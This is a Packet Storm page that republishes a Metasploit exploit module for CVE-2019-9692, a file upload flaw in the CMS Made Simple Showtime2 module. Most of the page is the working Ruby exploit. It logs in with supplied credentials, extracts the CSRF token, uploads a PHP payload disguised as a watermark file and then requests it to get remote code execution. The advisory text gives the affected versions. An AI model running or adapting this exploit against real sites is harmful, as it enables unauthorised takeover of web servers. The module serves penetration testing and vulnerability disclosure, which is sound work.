what you don't know can hurt you

CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution

CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution
Posted Mar 27, 2019
Authored by Daniele Scanu, Fabio Cogno | Site metasploit.com

This Metasploit module exploits a file upload vulnerability that allows for remote command execution in Showtime2 module versions 3.6.2 and below in CMS Made Simple (CMSMS). An authenticated user with "Use Showtime2" privilege could exploit the vulnerability. The vulnerability exists in the Showtime2 module, where the class "class.showtime2_image.php" does not ensure that a watermark file has a standard image file extension (GIF, JPG, JPEG, or PNG). Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0, 3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1.

tags | exploit, remote, php, file upload
advisories | CVE-2019-9692
MD5 | 34616f7d15896f8238efb1b0c1d26897

CMS Made Simple (CMSMS) Showtime2 File Upload Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper

def initialize(info = {})
super(update_info(info,
'Name' => "CMS Made Simple (CMSMS) Showtime2 File Upload RCE",
'Description' => %q(
This module exploits a File Upload vulnerability that lead in a RCE in
Showtime2 module (<= 3.6.2) in CMS Made Simple (CMSMS). An authenticated
user with "Use Showtime2" privilege could exploit the vulnerability.

The vulnerability exists in the Showtime2 module, where the class
"class.showtime2_image.php" does not ensure that a watermark file
has a standard image file extension (GIF, JPG, JPEG, or PNG).

Tested on Showtime2 3.6.2, 3.6.1, 3.6.0, 3.5.4, 3.5.3, 3.5.2, 3.5.1, 3.5.0,
3.4.5, 3.4.3, 3.4.2 on CMS Made Simple (CMSMS) 2.2.9.1
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniele Scanu', # Discovery & PoC
'Fabio Cogno' # Metasploit module
],
'References' =>
[
['CVE', '2019-9692'],
['CWE', '434'],
['EDB', '46546'],
['URL', 'https://forum.cmsmadesimple.org/viewtopic.php?f=1&t=80285'],
['URL', 'http://viewsvn.cmsmadesimple.org/diff.php?repname=showtime2&path=%2Ftrunk%2Flib%2Fclass.showtime2_image.php&rev=47']
],
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Automatic', {}]],
'Privileged' => false,
'DisclosureDate' => "Mar 11 2019",
'DefaultTarget' => 0))

register_options(
[
OptString.new('TARGETURI', [true, "Base CMS Made Simple directory path", '/']),
OptString.new('USERNAME', [true, "Username to authenticate with", '']),
OptString.new('PASSWORD', [false, "Password to authenticate with", ''])
]
)
end

def do_login
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
'vars_post' => {
'username' => datastore['username'],
'password' => datastore['password'],
'loginsubmit' => 'Submit'
}
)

unless res
fail_with(Failure::Unreachable, 'Connection failed')
end

if res.code == 302
@csrf_name = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-2].to_s
@csrf_value = res.headers['Location'].scan(/([^?=&]+)[=([^&]*)]?/).flatten[-1].to_s
@cookies = res.get_cookies
return
end

fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
end

def upload(fname, fcontent)
# construct POST data
data = Rex::MIME::Message.new
data.add_part('Showtime2,m1_,defaultadmin,0', nil, nil, "form-data; name=\"mact\"")
data.add_part('Upload', nil, nil, "form-data; name=\"m1_upload_submit\"")
data.add_part(@csrf_value, nil, nil, "form-data; name=\"#{@csrf_name}\"")
data.add_part(fcontent, 'text/plain', nil, "from-data; name=\"m1_input_browse\"; filename=\"#{fname}\"")

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'admin', 'moduleinterface.php'),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'headers' => {
'Cookie' => @cookies
}
)

unless res
fail_with(Failure::Unreachable, 'Connection failed')
end

if res.code == 200 && (res.body =~ /#{Regexp.escape(fname)}/i || res.body =~ /id="showoverview"/i)
return
end

print_warning('No confidence in PHP payload success or failure')
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'modules', 'Showtime2', 'moduleinfo.ini')
)

unless res
vprint_error 'Connection failed'
return CheckCode::Unknown
end

if res.code == 200
module_version = Gem::Version.new(res.body.scan(/^version = "?(\d\.\d\.\d)"?/).flatten.first)
if module_version < Gem::Version.new('3.6.3')
# Showtime2 module is uploaded and present on "Module Manager" section but it could be NOT installed.
vprint_status("Showtime2 version: #{module_version}")
return Exploit::CheckCode::Appears
end
end

return Exploit::CheckCode::Safe
end

def exploit
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end

@csrf_name = nil
@csrf_value = nil
@cookies = nil

do_login

# Upload PHP payload
fname = "#{rand_text_alphanumeric(3..9)}.php"
fcontent = "<?php #{payload.encode} ?>"
print_status('Uploading PHP payload.')
upload(fname, fcontent)

# Register uploaded PHP payload file for cleanup
register_files_for_cleanup('./' + fname)

# Retrieve and execute PHP payload
print_status("Making request for '/#{fname}' to execute payload.")
send_request_cgi(
{
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'uploads', 'images', fname)
},
15
)
end
end

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    1 Files
  • 2
    Dec 2nd
    16 Files
  • 3
    Dec 3rd
    17 Files
  • 4
    Dec 4th
    23 Files
  • 5
    Dec 5th
    11 Files
  • 6
    Dec 6th
    10 Files
  • 7
    Dec 7th
    1 Files
  • 8
    Dec 8th
    1 Files
  • 9
    Dec 9th
    15 Files
  • 10
    Dec 10th
    24 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close